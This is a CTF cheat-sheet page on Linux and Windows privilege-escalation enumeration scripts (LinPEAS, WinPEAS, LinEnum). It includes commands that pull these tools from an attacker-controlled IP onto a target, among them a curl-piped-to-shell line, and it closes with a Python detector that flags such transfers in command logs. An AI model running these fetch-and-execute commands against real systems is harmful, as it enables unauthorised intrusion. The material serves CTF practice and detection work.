CTF All The Things

Enumeration Scripts


Last updated 2 years ago

PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

This is the go-to script I use at the moment. It is frequently updated and available on GitHub: https://github.com/carlospolop/PEASS-ng

WinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/winPEASx64.exe
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/winPEAS.bat

On the Windows box, execute this one-liner to pull it over:

PowerShell Invoke-WebRequest -Uri http://10.14.6.200:8000/winPEASx64.exe -Outfile winpeas.exe

LinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/linpeas_linux_amd64
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/linpeas.sh

LinEnum

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Serve it over HTTP from your own machine:

python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...

Switch to the box, pull it over and execute:

curl http://10.9.17.195:8000/LinEnum.sh | sh

LinEnum is getting a bit old but still useful: https://github.com/rebootuser/LinEnum
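Seen from the defender's side, the transfer commands on this page leave recognisable process command lines. The following is an added example, not part of the original page or of the PEASS-ng or LinEnum projects: it flags records that combine at least two weak signals. The tab-separated log format, the rule names and the sample records are assumptions constructed for illustration.

```python
import re

# Names of the enumeration scripts this page downloads (case-insensitive).
TOOL_NAMES = re.compile(r"(linpeas|winpeas|linenum)[\w.]*", re.I)
# A fetch whose output is piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|da|z)?sh\b", re.I)
# A fetch over plain HTTP from a bare IPv4 address, optionally with a port.
RAW_IP_HTTP = re.compile(r"http://\d{1,3}(\.\d{1,3}){3}(:\d+)?/", re.I)
# The PowerShell download cmdlet saving its result to disk.
PS_DOWNLOAD = re.compile(r"Invoke-WebRequest\b.*-OutFile\s+\S+", re.I)

def classify(cmdline):
    """Return the sorted list of rule names that a command line triggers."""
    hits = set()
    if PIPE_TO_SHELL.search(cmdline):
        hits.add("download-piped-to-shell")
    if RAW_IP_HTTP.search(cmdline):
        hits.add("http-from-raw-ip")
    if PS_DOWNLOAD.search(cmdline):
        hits.add("powershell-download-to-disk")
    if TOOL_NAMES.search(cmdline):
        hits.add("enum-tool-name")
    return sorted(hits)

def scan(lines):
    """Parse 'host<TAB>user<TAB>cmdline' records; keep those with >= 2 rules."""
    findings = []
    for line in lines:
        host, user, cmdline = line.rstrip("\n").split("\t", 2)
        rules = classify(cmdline)
        if len(rules) >= 2:  # a single weak signal is too noisy to alert on
            findings.append((host, user, rules))
    return findings

# Constructed sample records (assumed log format, documentation addresses).
SAMPLE = [
    "web01\twww-data\tcurl http://192.0.2.10:8000/LinEnum.sh | sh",
    "ws07\tjsmith\tPowerShell Invoke-WebRequest -Uri http://192.0.2.10:8000/winPEASx64.exe -Outfile winpeas.exe",
    "web01\tdeploy\tcurl -fsSL https://example.com/health",
    "db02\tbackup\twget http://192.0.2.20/backup.tar.gz",
]

if __name__ == "__main__":
    for host, user, rules in scan(SAMPLE):
        print(host, user, ", ".join(rules))
```

The two-signal threshold keeps an ordinary download from an internal IP address (the last sample record) from raising a finding on its own.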